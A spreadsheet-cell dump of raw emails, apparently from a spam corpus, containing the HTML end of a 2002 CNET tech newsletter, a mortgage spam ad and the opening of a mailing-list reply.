 	2. &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6VKduOEJKns2asfI8UkRR" &gt;iRiver SlimX iMP-350&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfYoRyyaaf70SVbToBBPR" &gt;Sonicblue Rio Volt SP250&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGSXgwVYFigi7yr9FKgnR" &gt;Sonicblue Rio Riot&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqkpRhu1LydDX7NdmUVSeR" &gt;Archos Jukebox Recorder&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0Ww9YFp-E9kHF6q-jPexAyR" &gt;See all most popular&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
 	&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;/font&gt;&lt;/td&gt;
 	&lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" alt="" border="0" /&gt;&lt;/td&gt;
 	&lt;td bgcolor="#666666"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" alt="" border="0" /&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="5" bgcolor="#666666"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" alt="" border="0" /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign="top"&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=5 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="7" bgcolor="#cccccc"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;br /&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;p&gt;
 &lt;!-- software --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_soft.gif" alt="Software" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwBYId70nie23s1N87hJlR" &gt;CNET reviews four no-cost Web e-mailers&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;Yahoo now charges for services that were once free; Hotmail
    dumps accounts without so much as an explanation. So-called
    free Web-based e-mailers aren't quite as free-wheelin' as they
    once were. Are the savings worth the hassle? We take another
    look at "free" e-mailers.
 &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkHnWRjRq0QzbMuLbLad4R" &gt;More software&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /software --&gt;
 &lt;p&gt;
 &lt;!-- hardware --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_hard.gif" alt="Hardware" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzzADdmCZhKQcaLlAI6OrR" &gt;IBM's thin ThinkPads fit to a T&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;The ThinkPad T-series notebooks are fast, and they offer a
    great design, innovative features, and good support. For a
    comprehensive look at this line of notebooks, check out our
    verdict.
 &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qBTmVwKxTiMEyR1N675iR" &gt;More notebooks&lt;/a&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKH-e3ghcpVdngyV7VDjSPR" &gt;Read the review&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
    &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAELYwllg9Z5VKc-3P0BcR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /hardware --&gt;
 &lt;p&gt;
 &lt;!-- electronics --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_ele.gif" alt="Electronics" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwfrHttIYjKHbtbXYzHRR" &gt;MP3 player personality test&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;These days, there are almost as many types of MP3 player as
    there are types of MP3 listener.  That's why it can be a
    daunting task to winnow through what's available to find your
    perfect match.  Take our MP3 player personality test to find
    out which one suits you best.
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKMYt2AI7Bc1bJBykEmZR" &gt;More portable audio&lt;/a&gt;
 &lt;br&gt;
 &lt;/font&gt;
 &lt;!-- /electronics --&gt;
 &lt;p&gt;
 &lt;!-- tech trends --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_tech.gif" alt="Tech Trends" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK1S0n0ETs6gJLkjCXMZHnR" &gt;Gifts for grads: home entertainment&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;
   Fixing up that first apartment can be a trying time for a
    young grad. Make it easy by throwing in some home-theater
    equipment along with the congratulations. Combining a DVD
    player with a solid speaker system, the Onkyo HTS-L5 is the
    perfect all-in-one-device. Also on tap: portable DVD players,
    the best TiVo player we found, and a 27-inch HD-ready TV set
    that's perfect for the smart set.
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1UnQqKRV3V0z6qjySJGeR" &gt;More in Tech Trends&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /tech trends --&gt;
 &lt;p&gt;
 &lt;!-- software --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_soft.gif" alt="Software" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKmLnyZCZdWfGJ0kSyVjyR" &gt;Peachtree Complete Accounting 2003&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;For years, Peachtree has provided professional accounting to
    small businesses. As a result, Peachtree Complete 2003 has all
    the basics, including inventory control, time billing, and
    payroll management. And Peachtree even contains a wide array
    of Web tools for creating and maintaining an online store.
    What's new in 2003?
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpWqpyl3Th3wiOPYOLipujlR" &gt;More software&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /software --&gt;
 &lt;p&gt;
 &lt;!-- wireless --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_wi.gif" alt="Wireless" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdP0pV4BsnOIRzw0LGkk4R" &gt;Siemens S46&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;The company's second mobile for the U.S. market picks up where
    the stylish S40 left off. Like that earlier model, this one's
    a world phone with business-centric features. How impressive
    is it?
 &lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDFITIs_esdo6MzbuNK5xrR" &gt;More in wireless phones&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /wireless --&gt;
 &lt;p&gt;
 &lt;br clear=left&gt;
 &lt;a name="buzz"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 &lt;tr valign=bottom&gt;&lt;td width=70 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/BUZZMETER.gif" width=90 height=15 alt="Buzz Meter"&gt;&lt;/td&gt;
 &lt;td width=339&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt;&amp;nbsp;WorldCom woes continue&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=14&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=2 bgcolor="#CC9999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;font face="arial, helvetica" size="-1"&gt;
 WorldCom woes dominate, BearShare 4.0 isn't what it used to be,
 and Jaguar runs ahead of schedule.&lt;/font&gt;
 &lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;i&gt;--Laura Lindhe, executive editor, CNET Tech Trends&lt;/i&gt;&lt;/font&gt;
 &lt;p&gt; 
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;1&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QkpoX8LHlbgi4cHr7W6TiR" &gt;WorldCom&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
 I hate to put it first, but unfortunately, all other
    tech trends are overshadowed by this scandal. Now entering its
    fourth week as front-page news, WorldCom woes continue to sap
    investor confidence. This week's big story: the top execs from
    the company are standing silent against government accusations
    of wrongdoing.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;2&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFVqFy6WmDblRuaBDxRU4R" &gt;BearShare 4.0&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
 This new version of the well-known peer-to-peer
    software was been completely redesigned and comes in two
    flavors: free with ads and paid without ads. This is nice
    touch, but unfortunately, 4.0 fails in one key area:
    downloading music. It uses the Gnutella client, but in CNET's
    tests, it had an abysmal success rate at actually returning
    files.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;3&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsBDvgIJgwzk0xBfd-8WrR" &gt;Jaguar&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
   Who ever heard of an operating system release being
    early? Well, Apple is managing to pull off the impossible; it
    intends to ship an update to OS X in August, instead of the
    anticipated late fall time frame.   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;4&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzxPmareVXCHnpqL0wRR" &gt;Warcraft III&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
 Ah, summer: the perfect time to stay inside and
    sit in front of your computer. Warcraft III has just been
    released--right in time for the good weather. GameSpot calls
    it one the finest games ever made, but if that doesn't do it
    for you, there's another fighting game on deck (see No. 5).
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;5&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9SUaBu3rctPQDwwaMC9R" &gt;America's Army&lt;/a&gt;:&lt;/b&gt;&lt;br&gt; As Senior Editor Darren Gladstone pointed out in a recent column, the Army wants &lt;i&gt;you&lt;/i&gt; to play PC games.
    That's right: the United States Army spent $6.3 million
    developing its own title, and it has just launched a television
    campaign to drum up interest. Apparently, the campaign is
    working, since CNET users made America's Army a top search
    term last week.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td colspan="2" align="left"&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 For more Buzz, &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwpd9O5380ywQ-4d0P6cR" &gt;click here&lt;/a&gt;.
 &lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%25"&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;UL&gt;
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kir82T6EoaDkjVsTLZ8iR" &gt;Live tech help: submit your question now&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorV4trBr1yZeU_u_KnPR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2Mwy_1iWLXZBXqONOVnR" &gt;Find a job you love with more than 1 million postings&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdpWabR5w8PF_jEuwteR" &gt;Editors' Choice Award: Pioneer's HTS-910DV&lt;/A&gt; 
 &lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;!-- ### footer ### --&gt;
 &lt;table width="612" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="599" bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#eeeeee" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="575"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10"&gt;&lt;br&gt;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=d4-E0mqr6EdePDN0aCvaMdT2nvAyVEP69RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOsN0LL0TRnU3P83P5XlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4eiFO6wiZxrhBm0WHtheR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="8"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="601"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#ffcc00" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="37"&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zaHzjyFu8ZvQIzTKtR1yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHExneOuNyGEI9rCM8vlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXe2aSxOO_7DQESNPe-i4R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6pnE0c-RjHpx8lOheMncR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhLymI-AywvjsK-FdLPRR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPdjEyN5FUywq2NRJSBTZR" &gt;&lt;font color="#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height="25"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;table width=100% border=0 cellspacing=2 cellpadding=1&gt; &lt;tr valign=bottom&gt; &lt;td width=75% height=31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    Copyright 2002 CNET Networks, Inc. All rights reserved.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=31 valign=top&gt; &lt;div align=right&gt; &lt;img src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e404-02&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=93-V4Zm-JdN3VHS0HOCFJ2tr1cmKdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the BEST Rate On a Home Loan!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;C:\Mortgage\html1.htm&lt;/title&gt;
 &lt;meta content=3D"text/html; charset=3Dwindows-1252" http-equiv=3D"Content-=
 Type"&gt;
 &lt;style fprolloverstyle&gt;A:hover {
 	COLOR: #ff0000
 }
 &lt;/style&gt;
 &lt;meta content=3D"Microsoft FrontPage 3.0" name=3D"GENERATOR"&gt;
 &lt;/head&gt;
 &lt;body background bgProperties=3D"fixed" bgcolor=3D"#FFFFFF"&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial" size=3D"2" ptsize=3D"8"&gt;If you wo=
 uld like to be removed
 from future mailings, please reply with the word remove in the subject or =
 call
 888-418-2575.&lt;/font&gt;&lt;/p&gt;
 &lt;hr&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"6" face=3D"Arial" color=3D"#0000ff" P=
 TSIZE=3D"11"&gt;Let lenders
 compete for&lt;/font&gt;&lt;font size=3D"6" face=3D"Arial" color=3D"#000000" PTSIZE=
 =3D"11"&gt;&lt;br&gt;
 &lt;u&gt;&lt;i&gt;your&lt;/i&gt;&lt;/u&gt; &lt;/font&gt;&lt;font size=3D"6" face=3D"Arial" color=3D"#0000ff=
 " PTSIZE=3D"11"&gt;business!&lt;/font&gt;&lt;/b&gt;&lt;font
 size=3D"4" PTSIZE=3D"11" color=3D"#000000" face=3D"Arial"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;a href=3D"http://quotes.freehost1.com/?SP704J"&gt;&lt;font PTSIZE=3D"11"=
  face=3D"Arial"
 size=3D"3" color=3D"#0000FF"&gt;&lt;b&gt;Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;font face=3D"Ari=
 al" lang=3D"0" size=3D"1"
 PTSIZE=3D"8" FAMILY=3D"SANSSERIF"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;font color=3D"#008080" face=3D"Arial" lang=3D"0" PTSIZE=3D"10" FAM=
 ILY=3D"SANSSERIF" size=3D"3"&gt;&lt;b&gt;Cash
 back refinances&lt;br&gt;
 No Equity 2nd Trust Deeds&lt;br&gt;
 Debt Consolidation&lt;br&gt;
 No Income Verification&lt;br&gt;
 The most competitive interest rates!&lt;/b&gt;&lt;/font&gt;&lt;font color=3D"#008080" fac=
 e=3D"Arial" size=3D"2"
 PTSIZE=3D"11"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font color=3D"#008080" size=3D"4" PTSIZE=3D"11" face=3D"Arial"&gt;&lt;br=
 &gt;
 &lt;/font&gt;&lt;b&gt;&lt;font face=3D"Arial" PTSIZE=3D"8" size=3D"3"&gt;Fill in our quick &lt;=
 a
 href=3D"http://quotes.freehost1.com/?SP704J"&gt;pre-qualification form&lt;/a&gt; an=
 d you &lt;br&gt;
 will &lt;/font&gt;&lt;font face=3D"Arial"&gt;&lt;font size=3D"3"&gt;&lt;font ptsize=3D"10"&gt;get =
 competing loan offers,
 often&amp;nbsp;&lt;br&gt;
 within minutes from up to&lt;/font&gt;&lt;font face=3D"Tahoma" PTSIZE=3D"8"&gt; &lt;u&gt;thr=
 ee&lt;/u&gt; lenders!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;font
 face=3D"Tahoma" size=3D"2" PTSIZE=3D"11"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font size=3D"4" PTSIZE=3D"11"&gt;&lt;br&gt;
 &lt;a href=3D"http://quotes.freehost1.com/?SP704J"&gt;&lt;font color=3D"#0000FF"&gt;&lt;b=
 &gt;Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font
 face=3D"Arial" lang=3D"0" size=3D"4" PTSIZE=3D"11" FAMILY=3D"SANSSERIF"&gt;&lt;b=
 r&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=3D"#008080" size=3D"1" PTSIZE=3D"8" face=3D"A=
 rial"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D"#008080" face=3D"Arial" size=3D=
 "1" ptsize=3D"10"&gt;There is&lt;/font&gt;&lt;font
 color=3D"#000000" face=3D"Arial" size=3D"1" ptsize=3D"10"&gt; NEVER&lt;/font&gt;&lt;fo=
 nt color=3D"#008080"
 face=3D"Arial" size=3D"1" ptsize=3D"10"&gt; any fee to consumers for using th=
 is service.&lt;/font&gt;&lt;/b&gt;
 &lt;font color=3D"#000000" face=3D"Tahoma" PTSIZE=3D"11"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial" size=3D"1"&gt;Copyright =FFFFFFA9 19=
 99, 2000 eWorld Marketing,
 Inc.&lt;br&gt;
 888-418-2575&lt;br&gt;
 This is not a solicitation or offer to lend money.&amp;nbsp; &lt;br&gt;
 eWorld Marketing is not a lender, broker or &lt;br&gt;
 other financial intermediary.&amp;nbsp; We are a marketing company &lt;br&gt;
 that provides services to the mortgage industry.&lt;/font&gt; &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_724731589P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Brent Welch &lt;welch@panasas.com&gt;
 &gt; Date:  Thu, 18 Jul 2002 08:13:53 -0700
 &gt;
